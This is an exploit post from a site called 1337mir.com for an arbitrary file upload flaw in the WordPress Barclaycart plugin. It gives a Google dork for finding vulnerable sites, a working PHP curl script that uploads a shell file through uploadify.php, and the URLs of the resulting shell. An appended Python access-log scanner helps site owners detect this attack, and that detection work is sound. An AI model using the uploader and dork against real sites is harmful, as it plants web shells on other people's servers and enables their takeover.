1337mir.com
WP Barclaycart Plugins Arbitrary File Upload Vulnerability - 1337 MiR
Exploit title: WP Barclaycart Plugins Arbitrary File Upload Vulnerability
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:"wp-content/plugins/barclaycart"
Vulnerable location: wp-content/plugins/barclaycart/uploadify/uploadify.php

Exploit:

<?php
$uploadfile = "Sh1Ne.php";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile", 'folder' => '/wp-content/plugins/barclaycart/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Shell Access: http://localhost/wp-content/plugins/barclaycart/uploadify/Sh1Ne.php
or http://localhost/wp-content/uploads/[years]/[month]/
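
Added example, not part of the original advisory or the plugin's code: a log check a site owner can run to find requests that match the vulnerable location and the two shell paths listed above. It assumes the Apache/nginx "combined" access log format; the sample lines, IP addresses and the example.php file name are constructed.

```python
import re

# Paths from the advisory; the log format (Apache/nginx "combined") is an assumption.
UPLOADER = "/wp-content/plugins/barclaycart/uploadify/uploadify.php"
PLUGIN_DIR = "/wp-content/plugins/barclaycart/uploadify/"
UPLOADS_PHP = re.compile(r"^/wp-content/uploads/\d{4}/\d{2}/[^/]+\.php$")
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return (ip, finding, path, status) tuples for requests matching the advisory."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, method, target, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        path = target.split("?", 1)[0].lower()
        if path == UPLOADER:
            if method == "POST":
                uploaders.add(ip)
                findings.append((ip, "upload-attempt", path, status))
            continue
        dropped = (path.startswith(PLUGIN_DIR) and path.endswith(".php")) or UPLOADS_PHP.match(path)
        if dropped:
            # A 200 means the script exists and ran; worse if the same client POSTed first.
            if status == 200:
                label = "executed-after-upload" if ip in uploaders else "php-executed"
            else:
                label = "php-probe"
            findings.append((ip, label, path, status))
    return findings

# Constructed sample log lines (documentation IP ranges, hypothetical file names).
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2014:10:01:02 +0000] "POST /wp-content/plugins/barclaycart/uploadify/uploadify.php HTTP/1.1" 200 1 "-" "-"',
    '203.0.113.7 - - [12/Mar/2014:10:01:05 +0000] "GET /wp-content/plugins/barclaycart/uploadify/example.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [12/Mar/2014:10:02:00 +0000] "GET /wp-content/uploads/2014/03/photo.jpg HTTP/1.1" 200 20480 "-" "-"',
    '198.51.100.9 - - [12/Mar/2014:10:03:00 +0000] "GET /wp-content/uploads/2014/03/example.php HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

Any "executed-after-upload" or "php-executed" hit means a PHP file was served from a directory that should hold no request-reachable scripts other than the uploader itself, so the host should be treated as compromised until the file is examined.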